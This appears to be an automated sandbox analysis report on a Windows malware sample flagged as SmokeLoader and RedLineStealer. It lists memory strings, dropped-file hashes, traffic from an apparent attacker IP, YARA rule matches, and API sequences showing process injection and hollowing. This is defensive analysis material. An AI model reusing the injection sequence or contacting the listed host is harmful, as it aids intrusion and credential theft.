Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	String found in binary or memory: http://ocsps.ssl.com0
Source: explorer.exe, 00000001.00000000.1766257805.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1767359707.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1765907916.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1768511521.000000000C975000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: http://www.x-ways.net/order
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: http://www.x-ways.net/order.html-d.htmlS
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: http://www.x-ways.net/winhex/license
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: http://www.x-ways.net/winhex/license-d-f.htmlS
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: http://www.x-ways.net/winhex/subscribe
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: http://www.x-ways.net/winhex/subscribe-d.htmlU
Source: explorer.exe, 00000001.00000000.1768511521.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1764464126.0000000003700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1766706025.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1766706025.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: https://github.com/tesseract-ocr/tessdata/
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1768511521.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.dr	String found in binary or memory: https://www.ssl.com/repository0
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: https://www.x-ways.net/winhex/forum/
Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.dr	String found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443

Source: unknown

HTTPS traffic detected: 191.96.144.157:443 -> 192.168.2.4:49763 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 8.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: D931.exe PID: 7888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 7940, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00402F55 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F55
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401493
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401476
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014D5
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014AA
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014AD
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014B1
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004030B2 NtTerminateProcess,	0_2_004030B2
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00402F55 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F55
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401493
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401476
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014D5
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014AA
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014AD
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014B1
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_004030B2 NtTerminateProcess,	5_2_004030B2
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Code function: 7_2_030AA090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,	7_2_030AA090
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Code function: 7_2_030A96B0 NtProtectVirtualMemory,NtProtectVirtualMemory,	7_2_030A96B0
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Code function: 7_2_030A93F0 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,	7_2_030A93F0

Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401C5E	0_2_00401C5E
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_00401C0A	0_2_00401C0A
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A154D	0_2_004A154D
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A1C71	0_2_004A1C71
Source: C:\Users\user\Desktop\e0OOofAl0S.exe	Code function: 0_2_004A1CC5	0_2_004A1CC5
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00401C5E	5_2_00401C5E
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_00401C0A	5_2_00401C0A
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_005B154D	5_2_005B154D
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_005B1C71	5_2_005B1C71
Source: C:\Users\user\AppData\Roaming\busaafd	Code function: 5_2_005B1CC5	5_2_005B1CC5
Source: C:\Users\user\AppData\Local\Temp\D931.exe	Code function: 7_2_030AA700	7_2_030AA700

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\D931.exe 681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\svchost015.exe 7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B

Source: e0OOofAl0S.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: e0OOofAl0S.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: busaafd.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: svchost015.exe.7.dr	Binary string: \Device\CDROM
Source: svchost015.exe.7.dr	Binary string: \Device\PhysicalMemory
Source: svchost015.exe.7.dr	Binary string: \Device\PhysicalMemoryU
